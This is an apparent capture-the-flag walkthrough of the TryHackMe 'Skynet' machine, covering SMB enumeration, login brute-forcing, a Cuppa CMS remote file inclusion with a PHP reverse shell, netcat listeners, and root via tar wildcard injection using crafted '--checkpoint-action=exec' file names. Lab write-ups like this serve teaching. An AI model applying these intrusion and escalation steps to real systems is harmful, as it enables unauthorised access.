Got an IP from TryHackMe and I use the export command to store that IP Address in the linux environment variables.
export ip=10.10.108.117
Scanning
Starting off with a simple nmap scan to find open ports and services running on it using the following command.
$ nmap -sCV --min-rate 100 --max-rate 200 $ip
PORT STATE SERVICE
22/tcp open ssh
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http
|_http-title: Skynet
110/tcp open pop3
|_pop3-capabilities: RESP-CODES CAPA TOP PIPELINING AUTH-RESP-CODE SASL UIDL
139/tcp open netbios-ssn
143/tcp open imap
|_imap-capabilities: Pre-login LOGINDISABLEDA0001 IDLE LITERAL+ SASL-IR more have post-login listed ENABLE capabilities IMAP4rev1 OK ID LOGIN-REFERRALS
445/tcp open microsoft-ds
Host script results:
|_clock-skew: mean: 1h37m20s, deviation: 2h53m12s, median: -2m40s
|_nbstat: NetBIOS name: SKYNET, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.3.11-Ubuntu)
| Computer name: skynet
| NetBIOS computer name: SKYNET\x00
| Domain name: \x00
| FQDN: skynet
|_ System time: 2022-08-16T07:27:24-05:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-time:
| date: 2022-08-16T12:27:24
|_ start_date: N/A
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled but not required
From the nmap scan results it was found they have the following open ports in the system.
22 for SSH
80 for HTTP
110 for pop3
139 for netbios
143 for IMAP
445 for SMB that is shown as microsoft-ds in the scan result.
Enumeration
Start off the enumeration with the smb server to see how many shares they have and if can we access any of those without any credentials. SMB service many times gives us lots of information like Users, Domain Name, and Computer Name, etc.
SMB
Listing The Shares
$ smbclient -L ////$ip//
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
anonymous Disk Skynet Anonymous Share
milesdyson Disk Miles Dyson Personal Share
IPC$ IPC IPC Service (skynet server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP SKYNET
From the above shares listing, we can see there are some shares that are not come by default i.e anonymous and milesdyson. We can try to access that without giving a password.
smbclient //$ip/anonymous
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Thu Nov 26 21:04:00 2020
.. D 0 Tue Sep 17 12:20:17 2019
attention.txt N 163 Wed Sep 18 08:04:59 2019
logs D 0 Wed Sep 18 09:42:16 2019
9204224 blocks of size 1024. 5818464 blocks available
smb: \> cd logs
smb: \logs\> ls
. D 0 Wed Sep 18 09:42:16 2019
.. D 0 Thu Nov 26 21:04:00 2020
log2.txt N 0 Wed Sep 18 09:42:13 2019
log1.txt N 471 Wed Sep 18 09:41:59 2019
log3.txt N 0 Wed Sep 18 09:42:16 2019
9204224 blocks of size 1024. 5818460 blocks available
We got success with anonymous shares and got some files that are present in them. Upon checking I see log1.txt has some kind of password list and attention.txt some information also but they also mentioned the name Miles Dyson. We see a share name related to that also.
HTTP
Now we start enumerating the HTTP server, In the webserver, we are often interested to find some login pages, hidden files, directories, any information related to CMS and its versions if applicable, and Backend technologies and their versions, etc. After knowing that we try to find vulnerabilities in it.
After running ffuf for content, discovery found some pages on which squirrelmail have login functionality. I tried the fuzz with the user milesdyson as username and log1.txt as passwords list to find some valid credentials, the command is like the following.
-w is used to specify the wordlist in that case it log1.txt file.
:FUZZ is a keyword used to specify a FUZZING position, In which : is a separator and FUZZ is the actual keyword. Note we can avoid it for a single list but for multiple lists, we must supply it with different keywords.
-u is used to specify the URL.
-X is used to specify the request method.
-d is used to specify the web request data.
-H is used to specify the Request Header in that case it's Content-Type: application/x-www-form-urlencoded that must be supplied because we are sending a POST request with parameters.
-fs is used to filter results by their response size. We got a different response and many of them had the same sizes that have wrong credentials so we filter that request size so we only get a few of them that have a valid login.
Using the above command we got a valid login credential.
Valid Credentials
milesdyson:cyborg007haloterminator
Using the above credentials we can login to the squirrelmail server which is an email server in which we can send and receive emails. There we see milesdyson the user has some emails that we can read, there we found an email that says the following.
Samba Password reset
We have changed your smb password after the system malfunction.
Password: )s{A&2Z=F^n_E.B`
Another Password was found.
Other Emails and their content.
From: serenakogan@skynet
01100010 01100001 01101100 01101100 01110011 00100000 01101000 01100001 01110110
01100101 00100000 01111010 01100101 01110010 01101111 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111 00100000 01101101 01100101 00100000 01110100 01101111
00100000 01101101 01100101 00100000 01110100 01101111 00100000 01101101 01100101
00100000 01110100 01101111
---
i can i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to
you i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i i can i i i everything else . . . . . . . . . . . . . .
balls have a ball to me to me to me to me to me to me to me
i . . . . . . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
you i i i i i everything else . . . . . . . . . . . . . .
balls have 0 to me to me to me to me to me to me to me to me to
you i i i everything else . . . . . . . . . . . . . .
balls have zero to me to me to me to me to me to me to me to me to
Nothing Special there.
SMB - Miles
We have the miles smb password now so we can login using that.
$ smbclient //$ip/milesdyson -U milesdyson
Password for [WORKGROUP\milesdyson]:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Tue Sep 17 14:05:47 2019
.. D 0 Wed Sep 18 08:51:03 2019
Improving Deep Neural Networks.pdf N 5743095 Tue Sep 17 14:05:14 2019
Natural Language Processing-Building Sequence Models.pdf N 12927230 Tue Sep 17 14:05:14 2019
Convolutional Neural Networks-CNN.pdf N 19655446 Tue Sep 17 14:05:14 2019
notes D 0 Tue Sep 17 14:18:40 2019
Neural Networks and Deep Learning.pdf N 4304586 Tue Sep 17 14:05:14 2019
Structuring your Machine Learning Project.pdf N 3531427 Tue Sep 17 14:05:14 2019
9204224 blocks of size 1024. 5818448 blocks available
smb: \> cd notes
smb: \notes\> ls
. D 0 Tue Sep 17 14:18:40 2019
.. D 0 Tue Sep 17 14:05:47 2019
3.01 Search.md N 65601 Tue Sep 17 14:01:29 2019
4.01 Agent-Based Models.md N 5683 Tue Sep 17 14:01:29 2019
2.08 In Practice.md N 7949 Tue Sep 17 14:01:29 2019
0.00 Cover.md N 3114 Tue Sep 17 14:01:29 2019
1.02 Linear Algebra.md N 70314 Tue Sep 17 14:01:29 2019
important.txt N 117 Tue Sep 17 14:18:39 2019
6.01 pandas.md N 9221 Tue Sep 17 14:01:29 2019
3.00 Artificial Intelligence.md N 33 Tue Sep 17 14:01:29 2019
2.01 Overview.md N 1165 Tue Sep 17 14:01:29 2019
3.02 Planning.md N 71657 Tue Sep 17 14:01:29 2019
1.04 Probability.md N 62712 Tue Sep 17 14:01:29 2019
2.06 Natural Language Processing.md N 82633 Tue Sep 17 14:01:29 2019
2.00 Machine Learning.md N 26 Tue Sep 17 14:01:29 2019
1.03 Calculus.md N 40779 Tue Sep 17 14:01:29 2019
3.03 Reinforcement Learning.md N 25119 Tue Sep 17 14:01:29 2019
1.08 Probabilistic Graphical Models.md N 81655 Tue Sep 17 14:01:29 2019
1.06 Bayesian Statistics.md N 39554 Tue Sep 17 14:01:29 2019
6.00 Appendices.md N 20 Tue Sep 17 14:01:29 2019
1.01 Functions.md N 7627 Tue Sep 17 14:01:29 2019
2.03 Neural Nets.md N 144726 Tue Sep 17 14:01:29 2019
2.04 Model Selection.md N 33383 Tue Sep 17 14:01:29 2019
2.02 Supervised Learning.md N 94287 Tue Sep 17 14:01:29 2019
4.00 Simulation.md N 20 Tue Sep 17 14:01:29 2019
3.05 In Practice.md N 1123 Tue Sep 17 14:01:29 2019
1.07 Graphs.md N 5110 Tue Sep 17 14:01:29 2019
2.07 Unsupervised Learning.md N 21579 Tue Sep 17 14:01:29 2019
2.05 Bayesian Learning.md N 39443 Tue Sep 17 14:01:29 2019
5.03 Anonymization.md N 2516 Tue Sep 17 14:01:29 2019
5.01 Process.md N 5788 Tue Sep 17 14:01:29 2019
1.09 Optimization.md N 25823 Tue Sep 17 14:01:29 2019
1.05 Statistics.md N 64291 Tue Sep 17 14:01:29 2019
5.02 Visualization.md N 940 Tue Sep 17 14:01:29 2019
5.00 In Practice.md N 21 Tue Sep 17 14:01:29 2019
4.02 Nonlinear Dynamics.md N 44601 Tue Sep 17 14:01:29 2019
1.10 Algorithms.md N 28790 Tue Sep 17 14:01:29 2019
3.04 Filtering.md N 13360 Tue Sep 17 14:01:29 2019
1.00 Foundations.md N 22 Tue Sep 17 14:01:29 2019
9204224 blocks of size 1024. 5818448 blocks available
From above we see miles users have so many files in their shares but one file catches my eye, important.txt. The important.txt file has some useful things.
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
Above we see they write a To-do list in which they mentioned some important things related to his life and work but we are only interested in /45kra24zxs28v3yd that very looks like an http directory, and it is confirmed as a web directory when I visit. They are a valid directory but there is nothing special that we can exploit so I start the ffuf scan to do some content discovery.
Administrator Page mentioned it as a cuppa CMS and by using searchsploit cuppa cms we found a potential RFI(Remote File Inclusion) vulnerability. Knowing that I download a php reverse shell code bypentest monkey. Make some changes related to IP and port number and host that file using a Python http server. Then I use the following command that exploits RFI vulnerability in which they request our shell.php` file and executed it that gives us a remote reverse shell.
Note: Open your listener using nc -lvnp 4444 before running the following command.
After gaining access to the system with a low-privilege user www-data, I start enumerating the system like finding SUID binaries, sudo permissions, etc but nothing special is found when I use the following command to see the content of a crontab file.
cat /etc/crontab
I see there is a cronjob running by the root user. They are running /home/milesdyson/backups/backups.sh on every minute. I checked if can I read the backup.sh file and I see I can and they have the following content.
www-data@skynet:/home/milesdyson/backups$ ll
total 1640
-rwxr-xr-x 1 root root 74 Sep 17 2019 backup.sh
-rw-r--r-- 1 root root 4413440 Aug 16 09:58 backup.tgz
www-data@skynet:/home/milesdyson/backups$ cat backup.sh
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
There they backup everything in the /var/www/html directory to backup.tgz. One thing to note they use the wildcard * which means everything i.e files, directories, etc. This is a risky thing because there is a technique named wile card injection in which we can make files that look like an argument like the ls command in which we use an argument -al to list all files. For the tar binary, there is a documented way to execute the command with the following method.
Above we create a file shell.sh in /var/www/html that has a reverse shell command on it. Then use the following command to create a file that looks like an argument of the tar command that eventually executes the shell.sh file.
Recap: We make a file in the /var/www/html directory with the names --checkpoint-action=exec=sh shell.sh, /var/www/html/--checkpoint=1 and shell.sh that has our reverse shell command on it.
So when the cronjob run tar the command executes and they take the directory name as an argument that executes our shell command. The --checkpoint-action=exec= is a legit argument of the tarcommand that is used to run a system command after compressing a file. By following the above method I eventually received a reverse shell back from the root user.
Note: You have to start your listener using the nc -lvnp 5555 Command so you can catch the reverse shell.
Now you are a root user copies the flags and submits them to TryHackMe and solves the machine.
